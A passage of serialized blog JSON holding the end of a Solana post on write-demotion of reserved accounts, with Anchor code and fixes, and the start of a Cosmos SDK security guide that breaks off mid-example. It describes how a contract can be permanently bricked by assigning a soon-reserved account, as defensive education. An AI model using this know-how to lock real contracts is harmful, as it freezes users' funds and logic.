",{"type":26,"tag":41,"props":77603,"children":77606},{"href":77604,"rel":77605},"https://github.com/anza-xyz/agave/blob/cd76bf6b8da8ec3739f0df4e087de0e50028b034/reserved-account-keys/src/lib.rs#L142-L182",[45],[77607],{"type":32,"value":77608},"reserved account list",{"type":26,"tag":3430,"props":77610,"children":77611},{},[77612],{"type":32,"value":77613},"The account is invoked as a program without the upgradable loader being present in the transaction.",{"type":26,"tag":35,"props":77615,"children":77616},{},[77617],{"type":32,"value":77618},"The second case is generally covered by the executable check implemented previously.",{"type":26,"tag":35,"props":77620,"children":77621},{},[77622],{"type":32,"value":77623},"The first case, however, is far more dangerous — it can silently break your program logic without any obvious cause. Let’s dig deeper into that.",{"type":26,"tag":21485,"props":77625,"children":77627},{"id":77626},"the-reserved-account-list",[77628],{"type":32,"value":77629},"The Reserved Account List",{"type":26,"tag":35,"props":77631,"children":77632},{},[77633,77635,77640],{"type":32,"value":77634},"The Solana runtime maintains a ",{"type":26,"tag":41,"props":77636,"children":77638},{"href":77604,"rel":77637},[45],[77639],{"type":32,"value":77608},{"type":32,"value":77641},", which includes addresses with special semantics — such as built-in programs, precompiles, and sysvars.",{"type":26,"tag":35,"props":77643,"children":77644},{},[77645,77647,77654,77656,77661],{"type":32,"value":77646},"These accounts may initially behave like normal accounts. However, once they become reserved after a ",{"type":26,"tag":41,"props":77648,"children":77651},{"href":77649,"rel":77650},"https://github.com/anza-xyz/agave/blob/0e6d9bf8c81cd94dfdedb500af4ac17328cf7a43/runtime/src/bank.rs#L6469-L6474",[45],[77652],{"type":32,"value":77653},"feature gate is actived",{"type":32,"value":77655},", the runtime will ",{"type":26,"tag":84,"props":77657,"children":77658},{},[77659],{"type":32,"value":77660},"automatically demote them to read-only",{"type":32,"value":77662},", even if the transaction marked them as writable.",{"type":26,"tag":5512,"props":77664,"children":77666},{"className":5552,"code":77665,"language":5551,"meta":7,"style":7},"// https://github.com/anza-xyz/agave/blob/0e6d9bf8c81cd94dfdedb500af4ac17328cf7a43/runtime/src/bank.rs#L6469-L6474\n// Update active set of reserved account keys which are not allowed to be write locked\nself.reserved_account_keys = {\n    let mut reserved_keys = ReservedAccountKeys::clone(&self.reserved_account_keys);\n    reserved_keys.update_active_set(&self.feature_set);\n    Arc::new(reserved_keys)\n};\n",[77667],{"type":26,"tag":130,"props":77668,"children":77669},{"__ignoreMap":7},[77670,77678,77686,77710,77764,77802,77831],{"type":26,"tag":137,"props":77671,"children":77672},{"class":5559,"line":5560},[77673],{"type":26,"tag":137,"props":77674,"children":77675},{"style":5564},[77676],{"type":32,"value":77677},"// https://github.com/anza-xyz/agave/blob/0e6d9bf8c81cd94dfdedb500af4ac17328cf7a43/runtime/src/bank.rs#L6469-L6474\n",{"type":26,"tag":137,"props":77679,"children":77680},{"class":5559,"line":5412},[77681],{"type":26,"tag":137,"props":77682,"children":77683},{"style":5564},[77684],{"type":32,"value":77685},"// Update active set of reserved account keys which are not allowed to be write locked\n",{"type":26,"tag":137,"props":77687,"children":77688},{"class":5559,"line":5417},[77689,77693,77697,77702,77706],{"type":26,"tag":137,"props":77690,"children":77691},{"style":5573},[77692],{"type":32,"value":16304},{"type":26,"tag":137,"props":77694,"children":77695},{"style":5590},[77696],{"type":32,"value":470},{"type":26,"tag":137,"props":77698,"children":77699},{"style":5601},[77700],{"type":32,"value":77701},"reserved_account_keys ",{"type":26,"tag":137,"props":77703,"children":77704},{"style":5590},[77705],{"type":32,"value":289},{"type":26,"tag":137,"props":77707,"children":77708},{"style":5601},[77709],{"type":32,"value":5875},{"type":26,"tag":137,"props":77711,"children":77712},{"class":5559,"line":5642},[77713,77717,77721,77726,77730,77735,77739,77743,77747,77751,77755,77759],{"type":26,"tag":137,"props":77714,"children":77715},{"style":5573},[77716],{"type":32,"value":5576},{"type":26,"tag":137,"props":77718,"children":77719},{"style":5573},[77720],{"type":32,"value":5581},{"type":26,"tag":137,"props":77722,"children":77723},{"style":5584},[77724],{"type":32,"value":77725}," reserved_keys",{"type":26,"tag":137,"props":77727,"children":77728},{"style":5590},[77729],{"type":32,"value":5593},{"type":26,"tag":137,"props":77731,"children":77732},{"style":6009},[77733],{"type":32,"value":77734}," ReservedAccountKeys",{"type":26,"tag":137,"props":77736,"children":77737},{"style":5590},[77738],{"type":32,"value":6072},{"type":26,"tag":137,"props":77740,"children":77741},{"style":5682},[77742],{"type":32,"value":18011},{"type":26,"tag":137,"props":77744,"children":77745},{"style":5601},[77746],{"type":32,"value":165},{"type":26,"tag":137,"props":77748,"children":77749},{"style":5590},[77750],{"type":32,"value":5694},{"type":26,"tag":137,"props":77752,"children":77753},{"style":5573},[77754],{"type":32,"value":16304},{"type":26,"tag":137,"props":77756,"children":77757},{"style":5590},[77758],{"type":32,"value":470},{"type":26,"tag":137,"props":77760,"children":77761},{"style":5601},[77762],{"type":32,"value":77763},"reserved_account_keys);\n",{"type":26,"tag":137,"props":77765,"children":77766},{"class":5559,"line":5745},[77767,77772,77776,77781,77785,77789,77793,77797],{"type":26,"tag":137,"props":77768,"children":77769},{"style":5584},[77770],{"type":32,"value":77771},"    reserved_keys",{"type":26,"tag":137,"props":77773,"children":77774},{"style":5590},[77775],{"type":32,"value":470},{"type":26,"tag":137,"props":77777,"children":77778},{"style":5682},[77779],{"type":32,"value":77780},"update_active_set",{"type":26,"tag":137,"props":77782,"children":77783},{"style":5601},[77784],{"type":32,"value":165},{"type":26,"tag":137,"props":77786,"children":77787},{"style":5590},[77788],{"type":32,"value":5694},{"type":26,"tag":137,"props":77790,"children":77791},{"style":5573},[77792],{"type":32,"value":16304},{"type":26,"tag":137,"props":77794,"children":77795},{"style":5590},[77796],{"type":32,"value":470},{"type":26,"tag":137,"props":77798,"children":77799},{"style":5601},[77800],{"type":32,"value":77801},"feature_set);\n",{"type":26,"tag":137,"props":77803,"children":77804},{"class":5559,"line":5850},[77805,77810,77814,77818,77822,77827],{"type":26,"tag":137,"props":77806,"children":77807},{"style":6009},[77808],{"type":32,"value":77809},"    Arc",{"type":26,"tag":137,"props":77811,"children":77812},{"style":5590},[77813],{"type":32,"value":6072},{"type":26,"tag":137,"props":77815,"children":77816},{"style":5682},[77817],{"type":32,"value":17714},{"type":26,"tag":137,"props":77819,"children":77820},{"style":5601},[77821],{"type":32,"value":165},{"type":26,"tag":137,"props":77823,"children":77824},{"style":5584},[77825],{"type":32,"value":77826},"reserved_keys",{"type":26,"tag":137,"props":77828,"children":77829},{"style":5601},[77830],{"type":32,"value":5742},{"type":26,"tag":137,"props":77832,"children":77833},{"class":5559,"line":5878},[77834],{"type":26,"tag":137,"props":77835,"children":77836},{"style":5601},[77837],{"type":32,"value":19170},{"type":26,"tag":21485,"props":77839,"children":77841},{"id":77840},"consequences-silent-failures-and-bricked-programs",[77842],{"type":32,"value":77843},"Consequences: Silent Failures and Bricked Programs",{"type":26,"tag":35,"props":77845,"children":77846},{},[77847],{"type":32,"value":77848},"This behavior is especially dangerous when you constrain a program to be writable, for example, with anchor, it's pretty common to use the account(mut) constraint:",{"type":26,"tag":5512,"props":77850,"children":77852},{"className":5552,"code":77851,"language":5551,"meta":7,"style":7},"#[derive(Accounts)]\npub struct ChangeKing\u003C'info> {\n    #[account(mut)]\n    pub throne: Account\u003C'info, Throne>,\n\n    #[account(mut, constraint = old_king.key() == throne.king)]\n    pub old_king: AccountInfo\u003C'info>,\n\n    #[account(mut)]\n    pub new_king: AccountInfo\u003C'info>,\n\n    #[account(mut)]\n    pub payer: Signer\u003C'info>,\n}\n",[77853],{"type":26,"tag":130,"props":77854,"children":77855},{"__ignoreMap":7},[77856,77871,77898,77913,77952,77959,78006,78037,78044,78059,78090,78097,78112,78143],{"type":26,"tag":137,"props":77857,"children":77858},{"class":5559,"line":5560},[77859,77863,77867],{"type":26,"tag":137,"props":77860,"children":77861},{"style":5601},[77862],{"type":32,"value":25417},{"type":26,"tag":137,"props":77864,"children":77865},{"style":6009},[77866],{"type":32,"value":25422},{"type":26,"tag":137,"props":77868,"children":77869},{"style":5601},[77870],{"type":32,"value":22852},{"type":26,"tag":137,"props":77872,"children":77873},{"class":5559,"line":5412},[77874,77878,77882,77886,77890,77894],{"type":26,"tag":137,"props":77875,"children":77876},{"style":5573},[77877],{"type":32,"value":16281},{"type":26,"tag":137,"props":77879,"children":77880},{"style":5573},[77881],{"type":32,"value":23744},{"type":26,"tag":137,"props":77883,"children":77884},{"style":6009},[77885],{"type":32,"value":73911},{"type":26,"tag":137,"props":77887,"children":77888},{"style":5601},[77889],{"type":32,"value":25502},{"type":26,"tag":137,"props":77891,"children":77892},{"style":6009},[77893],{"type":32,"value":25507},{"type":26,"tag":137,"props":77895,"children":77896},{"style":5601},[77897],{"type":32,"value":9865},{"type":26,"tag":137,"props":77899,"children":77900},{"class":5559,"line":5417},[77901,77905,77909],{"type":26,"tag":137,"props":77902,"children":77903},{"style":5601},[77904],{"type":32,"value":25709},{"type":26,"tag":137,"props":77906,"children":77907},{"style":5573},[77908],{"type":32,"value":6325},{"type":26,"tag":137,"props":77910,"children":77911},{"style":5601},[77912],{"type":32,"value":22852},{"type":26,"tag":137,"props":77914,"children":77915},{"class":5559,"line":5642},[77916,77920,77924,77928,77932,77936,77940,77944,77948],{"type":26,"tag":137,"props":77917,"children":77918},{"style":5573},[77919],{"type":32,"value":23436},{"type":26,"tag":137,"props":77921,"children":77922},{"style":5584},[77923],{"type":32,"value":73950},{"type":26,"tag":137,"props":77925,"children":77926},{"style":5590},[77927],{"type":32,"value":7072},{"type":26,"tag":137,"props":77929,"children":77930},{"style":6009},[77931],{"type":32,"value":25674},{"type":26,"tag":137,"props":77933,"children":77934},{"style":5601},[77935],{"type":32,"value":25502},{"type":26,"tag":137,"props":77937,"children":77938},{"style":6009},[77939],{"type":32,"value":25507},{"type":26,"tag":137,"props":77941,"children":77942},{"style":5601},[77943],{"type":32,"value":1108},{"type":26,"tag":137,"props":77945,"children":77946},{"style":6009},[77947],{"type":32,"value":73975},{"type":26,"tag":137,"props":77949,"children":77950},{"style":5601},[77951],{"type":32,"value":8723},{"type":26,"tag":137,"props":77953,"children":77954},{"class":5559,"line":5745},[77955],{"type":26,"tag":137,"props":77956,"children":77957},{"emptyLinePlaceholder":18},[77958],{"type":32,"value":6276},{"type":26,"tag":137,"props":77960,"children":77961},{"class":5559,"line":5850},[77962,77966,77970,77974,77978,77982,77986,77990,77994,77998,78002],{"type":26,"tag":137,"props":77963,"children":77964},{"style":5601},[77965],{"type":32,"value":25709},{"type":26,"tag":137,"props":77967,"children":77968},{"style":5573},[77969],{"type":32,"value":6325},{"type":26,"tag":137,"props":77971,"children":77972},{"style":5601},[77973],{"type":32,"value":74010},{"type":26,"tag":137,"props":77975,"children":77976},{"style":5590},[77977],{"type":32,"value":289},{"type":26,"tag":137,"props":77979,"children":77980},{"style":5601},[77981],{"type":32,"value":74019},{"type":26,"tag":137,"props":77983,"children":77984},{"style":5590},[77985],{"type":32,"value":470},{"type":26,"tag":137,"props":77987,"children":77988},{"style":5601},[77989],{"type":32,"value":74028},{"type":26,"tag":137,"props":77991,"children":77992},{"style":5590},[77993],{"type":32,"value":11161},{"type":26,"tag":137,"props":77995,"children":77996},{"style":5601},[77997],{"type":32,"value":73950},{"type":26,"tag":137,"props":77999,"children":78000},{"style":5590},[78001],{"type":32,"value":470},{"type":26,"tag":137,"props":78003,"children":78004},{"style":5601},[78005],{"type":32,"value":74045},{"type":26,"tag":137,"props":78007,"children":78008},{"class":5559,"line":5878},[78009,78013,78017,78021,78025,78029,78033],{"type":26,"tag":137,"props":78010,"children":78011},{"style":5573},[78012],{"type":32,"value":23436},{"type":26,"tag":137,"props":78014,"children":78015},{"style":5584},[78016],{"type":32,"value":74019},{"type":26,"tag":137,"props":78018,"children":78019},{"style":5590},[78020],{"type":32,"value":7072},{"type":26,"tag":137,"props":78022,"children":78023},{"style":6009},[78024],{"type":32,"value":27990},{"type":26,"tag":137,"props":78026,"children":78027},{"style":5601},[78028],{"type":32,"value":25502},{"type":26,"tag":137,"props":78030,"children":78031},{"style":6009},[78032],{"type":32,"value":25507},{"type":26,"tag":137,"props":78034,"children":78035},{"style":5601},[78036],{"type":32,"value":8723},{"type":26,"tag":137,"props":78038,"children":78039},{"class":5559,"line":5891},[78040],{"type":26,"tag":137,"props":78041,"children":78042},{"emptyLinePlaceholder":18},[78043],{"type":32,"value":6276},{"type":26,"tag":137,"props":78045,"children":78046},{"class":5559,"line":5909},[78047,78051,78055],{"type":26,"tag":137,"props":78048,"children":78049},{"style":5601},[78050],{"type":32,"value":25709},{"type":26,"tag":137,"props":78052,"children":78053},{"style":5573},[78054],{"type":32,"value":6325},{"type":26,"tag":137,"props":78056,"children":78057},{"style":5601},[78058],{"type":32,"value":22852},{"type":26,"tag":137,"props":78060,"children":78061},{"class":5559,"line":5930},[78062,78066,78070,78074,78078,78082,78086],{"type":26,"tag":137,"props":78063,"children":78064},{"style":5573},[78065],{"type":32,"value":23436},{"type":26,"tag":137,"props":78067,"children":78068},{"style":5584},[78069],{"type":32,"value":74118},{"type":26,"tag":137,"props":78071,"children":78072},{"style":5590},[78073],{"type":32,"value":7072},{"type":26,"tag":137,"props":78075,"children":78076},{"style":6009},[78077],{"type":32,"value":27990},{"type":26,"tag":137,"props":78079,"children":78080},{"style":5601},[78081],{"type":32,"value":25502},{"type":26,"tag":137,"props":78083,"children":78084},{"style":6009},[78085],{"type":32,"value":25507},{"type":26,"tag":137,"props":78087,"children":78088},{"style":5601},[78089],{"type":32,"value":8723},{"type":26,"tag":137,"props":78091,"children":78092},{"class":5559,"line":5939},[78093],{"type":26,"tag":137,"props":78094,"children":78095},{"emptyLinePlaceholder":18},[78096],{"type":32,"value":6276},{"type":26,"tag":137,"props":78098,"children":78099},{"class":5559,"line":6191},[78100,78104,78108],{"type":26,"tag":137,"props":78101,"children":78102},{"style":5601},[78103],{"type":32,"value":25709},{"type":26,"tag":137,"props":78105,"children":78106},{"style":5573},[78107],{"type":32,"value":6325},{"type":26,"tag":137,"props":78109,"children":78110},{"style":5601},[78111],{"type":32,"value":22852},{"type":26,"tag":137,"props":78113,"children":78114},{"class":5559,"line":6208},[78115,78119,78123,78127,78131,78135,78139],{"type":26,"tag":137,"props":78116,"children":78117},{"style":5573},[78118],{"type":32,"value":23436},{"type":26,"tag":137,"props":78120,"children":78121},{"style":5584},[78122],{"type":32,"value":44839},{"type":26,"tag":137,"props":78124,"children":78125},{"style":5590},[78126],{"type":32,"value":7072},{"type":26,"tag":137,"props":78128,"children":78129},{"style":6009},[78130],{"type":32,"value":25738},{"type":26,"tag":137,"props":78132,"children":78133},{"style":5601},[78134],{"type":32,"value":25502},{"type":26,"tag":137,"props":78136,"children":78137},{"style":6009},[78138],{"type":32,"value":25507},{"type":26,"tag":137,"props":78140,"children":78141},{"style":5601},[78142],{"type":32,"value":8723},{"type":26,"tag":137,"props":78144,"children":78145},{"class":5559,"line":6225},[78146],{"type":26,"tag":137,"props":78147,"children":78148},{"style":5601},[78149],{"type":32,"value":6507},{"type":26,"tag":35,"props":78151,"children":78152},{},[78153,78155,78161,78163,78169],{"type":32,"value":78154},"This works fine — until one day, ",{"type":26,"tag":130,"props":78156,"children":78158},{"className":78157},[],[78159],{"type":32,"value":78160},"old_king",{"type":32,"value":78162}," is silently demoted. Suddenly, the ",{"type":26,"tag":130,"props":78164,"children":78166},{"className":78165},[],[78167],{"type":32,"value":78168},"#[account(mut)]",{"type":32,"value":78170}," constraint fails, and your program is bricked. Even though you're passing a writable account in the transaction, the runtime has made a unilateral decision to override that.",{"type":26,"tag":21485,"props":78172,"children":78174},{"id":78173},"real-world-example-write-demotion-with-secp256r1_program",[78175,78177],{"type":32,"value":78176},"Real-World Example: Write-Demotion with ",{"type":26,"tag":130,"props":78178,"children":78180},{"className":78179},[],[78181],{"type":32,"value":78182},"secp256r1_program",{"type":26,"tag":35,"props":78184,"children":78185},{},[78186,78188,78193],{"type":32,"value":78187},"Here’s a concrete example of the write-demotion trap playing out on mainnet — involving ",{"type":26,"tag":130,"props":78189,"children":78191},{"className":78190},[],[78192],{"type":32,"value":78182},{"type":32,"value":78194},", a precompiled program gated behind a feature flag:",{"type":26,"tag":5512,"props":78196,"children":78198},{"className":5552,"code":78197,"language":5551,"meta":7,"style":7},"ReservedAccount::new_pending(\n    secp256r1_program::id(),\n    feature_set::enable_secp256r1_precompile::id(),\n)\n",[78199],{"type":26,"tag":130,"props":78200,"children":78201},{"__ignoreMap":7},[78202,78223,78243,78272],{"type":26,"tag":137,"props":78203,"children":78204},{"class":5559,"line":5560},[78205,78210,78214,78219],{"type":26,"tag":137,"props":78206,"children":78207},{"style":6009},[78208],{"type":32,"value":78209},"ReservedAccount",{"type":26,"tag":137,"props":78211,"children":78212},{"style":5590},[78213],{"type":32,"value":6072},{"type":26,"tag":137,"props":78215,"children":78216},{"style":5682},[78217],{"type":32,"value":78218},"new_pending",{"type":26,"tag":137,"props":78220,"children":78221},{"style":5601},[78222],{"type":32,"value":6054},{"type":26,"tag":137,"props":78224,"children":78225},{"class":5559,"line":5412},[78226,78231,78235,78239],{"type":26,"tag":137,"props":78227,"children":78228},{"style":5601},[78229],{"type":32,"value":78230},"    secp256r1_program",{"type":26,"tag":137,"props":78232,"children":78233},{"style":5590},[78234],{"type":32,"value":6072},{"type":26,"tag":137,"props":78236,"children":78237},{"style":5682},[78238],{"type":32,"value":6077},{"type":26,"tag":137,"props":78240,"children":78241},{"style":5601},[78242],{"type":32,"value":6082},{"type":26,"tag":137,"props":78244,"children":78245},{"class":5559,"line":5417},[78246,78251,78255,78260,78264,78268],{"type":26,"tag":137,"props":78247,"children":78248},{"style":5601},[78249],{"type":32,"value":78250},"    feature_set",{"type":26,"tag":137,"props":78252,"children":78253},{"style":5590},[78254],{"type":32,"value":6072},{"type":26,"tag":137,"props":78256,"children":78257},{"style":5601},[78258],{"type":32,"value":78259},"enable_secp256r1_precompile",{"type":26,"tag":137,"props":78261,"children":78262},{"style":5590},[78263],{"type":32,"value":6072},{"type":26,"tag":137,"props":78265,"children":78266},{"style":5682},[78267],{"type":32,"value":6077},{"type":26,"tag":137,"props":78269,"children":78270},{"style":5601},[78271],{"type":32,"value":6082},{"type":26,"tag":137,"props":78273,"children":78274},{"class":5559,"line":5642},[78275],{"type":26,"tag":137,"props":78276,"children":78277},{"style":5601},[78278],{"type":32,"value":5742},{"type":26,"tag":35,"props":78280,"children":78281},{},[78282,78284,78289,78291,78297],{"type":32,"value":78283},"Before the ",{"type":26,"tag":130,"props":78285,"children":78287},{"className":78286},[],[78288],{"type":32,"value":78259},{"type":32,"value":78290}," feature is activated, this account behaves like any ordinary one. You can assign ",{"type":26,"tag":130,"props":78292,"children":78294},{"className":78293},[],[78295],{"type":32,"value":78296},"secp256r1_program::id()",{"type":32,"value":78298}," as the king in a contract.",{"type":26,"tag":35,"props":78300,"children":78301},{},[78302,78304,78309],{"type":32,"value":78303},"But once the feature is flipped on, the runtime silently marks it as read-only, blocking any future writes. As a result, ",{"type":26,"tag":130,"props":78305,"children":78307},{"className":78306},[],[78308],{"type":32,"value":78296},{"type":32,"value":78310}," becomes the eternal king, and no one can dethrone it.",{"type":26,"tag":21485,"props":78312,"children":78314},{"id":78313},"fix-3-preventing-write-demotion-pitfalls",[78315],{"type":32,"value":78316},"Fix 3: Preventing Write-Demotion Pitfalls",{"type":26,"tag":35,"props":78318,"children":78319},{},[78320,78322,78327],{"type":32,"value":78321},"Alright, let’s try to fix this ",{"type":26,"tag":762,"props":78323,"children":78324},{},[78325],{"type":32,"value":78326},"yet another",{"type":32,"value":78328}," edge case — and hopefully close the book on it.",{"type":26,"tag":21485,"props":78330,"children":78332},{"id":78331},"attempt-1-block-known-reserved-accounts",[78333],{"type":32,"value":78334},"Attempt 1: Block Known Reserved Accounts",{"type":26,"tag":35,"props":78336,"children":78337},{},[78338],{"type":32,"value":78339},"One naive solution is to reject any known reserved account, for example:",{"type":26,"tag":5512,"props":78341,"children":78343},{"className":42957,"code":78342,"language":42959,"meta":7,"style":7},"    pub fn change_king(ctx: Context\u003CChangeKing>, bid_amount: u64) -> Result\u003C()> {\n+       assert!(ctx.accounts.new_king.key() != secp256r1_program::id());\n",[78344],{"type":26,"tag":130,"props":78345,"children":78346},{"__ignoreMap":7},[78347,78355],{"type":26,"tag":137,"props":78348,"children":78349},{"class":5559,"line":5560},[78350],{"type":26,"tag":137,"props":78351,"children":78352},{"style":5601},[78353],{"type":32,"value":78354},"    pub fn change_king(ctx: Context\u003CChangeKing>, bid_amount: u64) -> Result\u003C()> {\n",{"type":26,"tag":137,"props":78356,"children":78357},{"class":5559,"line":5412},[78358],{"type":26,"tag":137,"props":78359,"children":78360},{"style":5626},[78361],{"type":32,"value":78362},"+       assert!(ctx.accounts.new_king.key() != secp256r1_program::id());\n",{"type":26,"tag":35,"props":78364,"children":78365},{},[78366,78368,78373],{"type":32,"value":78367},"This works in the short term, but doesn’t scale — you can’t predict all future additions to the ",{"type":26,"tag":130,"props":78369,"children":78371},{"className":78370},[],[78372],{"type":32,"value":78209},{"type":32,"value":78374}," list. The moment a new reserved account is introduced, your program becomes vulnerable again.",{"type":26,"tag":21485,"props":78376,"children":78378},{"id":78377},"attempt-2-use-a-pda-vault",[78379],{"type":32,"value":78380},"Attempt 2: Use a PDA Vault",{"type":26,"tag":35,"props":78382,"children":78383},{},[78384,78386,78391],{"type":32,"value":78385},"A more future-proof fix is to avoid ",{"type":26,"tag":84,"props":78387,"children":78388},{},[78389],{"type":32,"value":78390},"transferring lamports to arbitrary accounts",{"type":32,"value":78392}," altogether.",{"type":26,"tag":35,"props":78394,"children":78395},{},[78396],{"type":32,"value":78397},"A clean approach would be to store the refund lamports in a PDA vault owned by your program. This prevents your logic from depending on accounts you don’t have complete control over, and sidesteps any risk of write-demotion or future account restrictions.",{"type":26,"tag":92,"props":78399,"children":78401},{"id":78400},"final-thoughts",[78402],{"type":32,"value":78403},"Final Thoughts",{"type":26,"tag":35,"props":78405,"children":78406},{},[78407],{"type":32,"value":78408},"Transferring lamports on Solana is not always straightforward and carries potential risks. Account constraints alone are insufficient to ensure safety, especially when dealing with runtime-specific edge cases.",{"type":26,"tag":35,"props":78410,"children":78411},{},[78412],{"type":32,"value":78413},"We can safely transfer lamports to an account under the following conditions:",{"type":26,"tag":3426,"props":78415,"children":78416},{},[78417,78422,78427],{"type":26,"tag":3430,"props":78418,"children":78419},{},[78420],{"type":32,"value":78421},"It's not executable.",{"type":26,"tag":3430,"props":78423,"children":78424},{},[78425],{"type":32,"value":78426},"Its balance, after the transfer, remains rent-exempt.",{"type":26,"tag":3430,"props":78428,"children":78429},{},[78430],{"type":32,"value":78431},"It's not a reserved account.",{"type":26,"tag":35,"props":78433,"children":78434},{},[78435],{"type":32,"value":78436},"This issue is not purely theoretical; it has impacted real-world programs. One significant case was recently reported to Jito via the bug bounty, which could have resulted in incorrect tip payments.",{"type":26,"tag":7949,"props":78438,"children":78439},{},[78440],{"type":32,"value":7953},{"title":7,"searchDepth":5412,"depth":5412,"links":78442},[78443,78444,78445,78451],{"id":31609,"depth":5412,"text":31612},{"id":73825,"depth":5412,"text":73828},{"id":74932,"depth":5412,"text":74935,"children":78446},[78447,78448,78450],{"id":74938,"depth":5417,"text":74941},{"id":75625,"depth":5417,"text":78449},"Bug 2: Writable but Untouchable — set_lamports Fails",{"id":76930,"depth":5417,"text":76933},{"id":78400,"depth":5412,"text":78403},"content:blog:2025-05-14-king-of-the-sol.md","blog/2025-05-14-king-of-the-sol.md","blog/2025-05-14-king-of-the-sol",{"_path":78456,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":78457,"description":78458,"date":78459,"author":78460,"image":78461,"isFeatured":18,"onBlogPage":18,"tags":78463,"body":78466,"_type":5433,"_id":92350,"_source":5435,"_file":92351,"_stem":92352,"_extension":5438},"/blog/2025-06-10-cosmos-security","Cosmos Security: An Otter's Guide","From infinite loops and map determinism to AnteHandler missteps and storage key collisions, we highlight real-world vulnerabilities and actionable advice for building safer Cosmos-based projects.","2025-06-10","james",{"src":78462,"width":17,"height":17},"/posts/cosmos-security/title.png",[78464,78465],"cosmos-sdk","security",{"type":23,"children":78467,"toc":92328},[78468,78472,78477,78482,78488,78493,78498,78503,78764,79253,79272,79277,79282,79287,79293,79298,79333,79343,79849,79869,79882,79888,79893,79898,80139,80144,80152,80164,80526,80531,80536,80572,80581,81007,81028,81034,81054,81075,81094,81126,81138,81150,81804,81832,81841,82281,82308,82328,82333,82354,82403,82412,83644,83672,83678,83683,83688,83708,83995,84029,84210,84215,84220,84264,84273,85465,85716,85729,85735,85769,85774,85837,85842,85862,85881,85893,85912,86604,86609,86614,86642,86651,87536,87563,87569,87589,87594,87607,87781,87794,87885,87890,87898,87908,88058,88063,88083,88091,88096,88494,88506,88511,88552,88563,88583,88891,88896,89821,89833,89841,89846,90839,90844,90856,90876,90895,91809,91866,91972,91984,91989,91994,92022,92031,92257,92283,92296,92310,92314,92319,92324],{"type":26,"tag":92,"props":78469,"children":78470},{"id":31609},[78471],{"type":32,"value":31612},{"type":26,"tag":35,"props":78473,"children":78474},{},[78475],{"type":32,"value":78476},"The Cosmos SDK is an \"L1 toolkit\" for developers. It provides an open-source tool that enhances the ability to build application-specific L1 chains, all while prioritizing flexibility and control over the entire runtime environment. Unfortunately, with the convenience of the Cosmos SDK, security can be an oversight.",{"type":26,"tag":35,"props":78478,"children":78479},{},[78480],{"type":32,"value":78481},"In this comprehensive blog post, we break down security issues that are often overseen by developers, supported by real-world examples from live projects. Our goal is to provide a practical exploration of security vulnerabilities while also offering insights on how developers can identify and address these issues on their own.",{"type":26,"tag":92,"props":78483,"children":78485},{"id":78484},"its-loopin-time",[78486],{"type":32,"value":78487},"It's Loopin' Time",{"type":26,"tag":35,"props":78489,"children":78490},{},[78491],{"type":32,"value":78492},"There are notable differences in building app-specific L1s using the SDK and building contracts on established L1 chains. It is especially crucial to recognize that maintaining the stability of a blockchain is dependent on the developer.",{"type":26,"tag":35,"props":78494,"children":78495},{},[78496],{"type":32,"value":78497},"Below, we begin to demonstrate the differences between writing smart contracts with Solidity vs developing L1 with the Cosmos SDK.",{"type":26,"tag":35,"props":78499,"children":78500},{},[78501],{"type":32,"value":78502},"Here is a simple example for reference:",{"type":26,"tag":5512,"props":78504,"children":78506},{"code":78505,"language":7054,"meta":7,"className":7055,"style":7},"function sumWithStride(\n    uint64 start,\n    uint64 stride,\n    uint64[] memory arr\n) public returns (uint64) {\n    uint64 idx = start;\n    uint64 sum = 0;\n    uint64 end = arr.length;\n\n    while (idx \u003C end) {\n        sum += arr[idx];\n        idx += stride;\n    }\n    return sum;\n}\n",[78507],{"type":26,"tag":130,"props":78508,"children":78509},{"__ignoreMap":7},[78510,78526,78543,78559,78581,78610,78631,78655,78676,78683,78704,78721,78738,78745,78757],{"type":26,"tag":137,"props":78511,"children":78512},{"class":5559,"line":5560},[78513,78517,78522],{"type":26,"tag":137,"props":78514,"children":78515},{"style":5573},[78516],{"type":32,"value":33972},{"type":26,"tag":137,"props":78518,"children":78519},{"style":5682},[78520],{"type":32,"value":78521}," sumWithStride",{"type":26,"tag":137,"props":78523,"children":78524},{"style":5601},[78525],{"type":32,"value":6054},{"type":26,"tag":137,"props":78527,"children":78528},{"class":5559,"line":5412},[78529,78534,78539],{"type":26,"tag":137,"props":78530,"children":78531},{"style":6009},[78532],{"type":32,"value":78533},"    uint64",{"type":26,"tag":137,"props":78535,"children":78536},{"style":5584},[78537],{"type":32,"value":78538}," start",{"type":26,"tag":137,"props":78540,"children":78541},{"style":5601},[78542],{"type":32,"value":6099},{"type":26,"tag":137,"props":78544,"children":78545},{"class":5559,"line":5417},[78546,78550,78555],{"type":26,"tag":137,"props":78547,"children":78548},{"style":6009},[78549],{"type":32,"value":78533},{"type":26,"tag":137,"props":78551,"children":78552},{"style":5584},[78553],{"type":32,"value":78554}," stride",{"type":26,"tag":137,"props":78556,"children":78557},{"style":5601},[78558],{"type":32,"value":6099},{"type":26,"tag":137,"props":78560,"children":78561},{"class":5559,"line":5642},[78562,78566,78571,78576],{"type":26,"tag":137,"props":78563,"children":78564},{"style":6009},[78565],{"type":32,"value":78533},{"type":26,"tag":137,"props":78567,"children":78568},{"style":5601},[78569],{"type":32,"value":78570},"[] ",{"type":26,"tag":137,"props":78572,"children":78573},{"style":5573},[78574],{"type":32,"value":78575},"memory",{"type":26,"tag":137,"props":78577,"children":78578},{"style":5584},[78579],{"type":32,"value":78580}," arr\n",{"type":26,"tag":137,"props":78582,"children":78583},{"class":5559,"line":5745},[78584,78588,78592,78597,78601,78606],{"type":26,"tag":137,"props":78585,"children":78586},{"style":5601},[78587],{"type":32,"value":5671},{"type":26,"tag":137,"props":78589,"children":78590},{"style":5573},[78591],{"type":32,"value":64276},{"type":26,"tag":137,"props":78593,"children":78594},{"style":5610},[78595],{"type":32,"value":78596}," returns",{"type":26,"tag":137,"props":78598,"children":78599},{"style":5601},[78600],{"type":32,"value":4625},{"type":26,"tag":137,"props":78602,"children":78603},{"style":6009},[78604],{"type":32,"value":78605},"uint64",{"type":26,"tag":137,"props":78607,"children":78608},{"style":5601},[78609],{"type":32,"value":17395},{"type":26,"tag":137,"props":78611,"children":78612},{"class":5559,"line":5850},[78613,78617,78622,78626],{"type":26,"tag":137,"props":78614,"children":78615},{"style":6009},[78616],{"type":32,"value":78533},{"type":26,"tag":137,"props":78618,"children":78619},{"style":5601},[78620],{"type":32,"value":78621}," idx ",{"type":26,"tag":137,"props":78623,"children":78624},{"style":5590},[78625],{"type":32,"value":289},{"type":26,"tag":137,"props":78627,"children":78628},{"style":5601},[78629],{"type":32,"value":78630}," 